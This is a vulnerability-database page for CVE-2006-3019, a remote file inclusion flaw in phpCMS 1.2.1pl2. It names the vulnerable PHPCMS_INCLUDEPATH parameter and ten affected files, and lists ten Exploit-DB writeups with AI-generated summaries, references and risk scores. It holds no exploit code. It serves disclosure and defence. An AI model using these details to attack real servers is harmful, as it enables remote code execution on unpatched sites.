CVE-2006-3019

phpCMS 1.2.1pl2 - Remote Code Execution via PHPCMS_INCLUDEPATH Parameter

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 10 public exploits for CVE-2006-3019. PoCs published by Federico Fazzi.

AI-analyzed exploit summary The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Description

Multiple PHP remote file inclusion vulnerabilities in phpCMS 1.2.1pl2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPCMS_INCLUDEPATH parameter to files in parser/include/ including (1) class.parser_phpcms.php, (2) class.session_phpcms.php, (3) class.edit_phpcms.php, (4) class.http_indexer_phpcms.php, (5) class.cache_phpcms.php, (6) class.search_phpcms.php, (7) class.lib_indexer_universal_phpcms.php, and (8) class.layout_phpcms.php, (9) parser/plugs/counter.php, and (10) parser/parser.php. NOTE: the class.cache_phpcms.php vector was also reported to affect 1.1.7.

Exploits (10)

exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29344

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Remote file inclusion must be enabled on the target server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29343

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It highlights the lack of input sanitization, allowing attackers to include arbitrary remote files via the PHPCMS_INCLUDEPATH parameter.

Classification
Writeup 80%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Access to the vulnerable endpoint · Ability to host a malicious file on a remote server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29346

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion enabled on the server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29350

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion configuration enabled
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29345

This is a vulnerability writeup describing a remote file inclusion (RFI) vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. The issue arises due to insufficient sanitization of user-supplied data in the 'PHPCMS_INCLUDEPATH' parameter, allowing remote command execution via malicious URL inclusion.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion enabled on the server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29351

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP configuration allowing remote file inclusion
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29352

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2 due to insufficient sanitization of user-supplied data. An attacker can exploit this by manipulating the PHPCMS_INCLUDEPATH parameter to include arbitrary remote files.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · Ability to host a malicious file on a remote server
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29348

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP configuration allowing remote file inclusion
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29347

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2 due to insufficient sanitization of user-supplied data. The exploit allows an attacker to include arbitrary remote files via the PHPCMS_INCLUDEPATH parameter.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · Remote file hosting for malicious payload
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WRITEUP VERIFIED
by Federico Fazzi · textwebappsphp
https://www.exploit-db.com/exploits/29349

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion settings enabled
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (17)

Core 17
Core References
Vendor Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/20573
Third Party Advisory third-party-advisory x_refsource_sreason
http://securityreason.com/securityalert/1106
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26394
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26396
Third Party Advisory, VDB Entry vdb-entry x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/27067
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26395
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26397
Vendor Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2006/2302
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/455302/100/0/threaded
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/436893/100/0/threaded
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26391
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26390
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/21768
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26389
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26392
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26388
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26393

Scores

EPSS 0.0774
EPSS Percentile 93.9%

Details

CWE
CWE-94
Status published
Products (1)
phpcms/phpcms 1.2.1_p12
Published Jun 15, 2006
Tracked Since Feb 18, 2026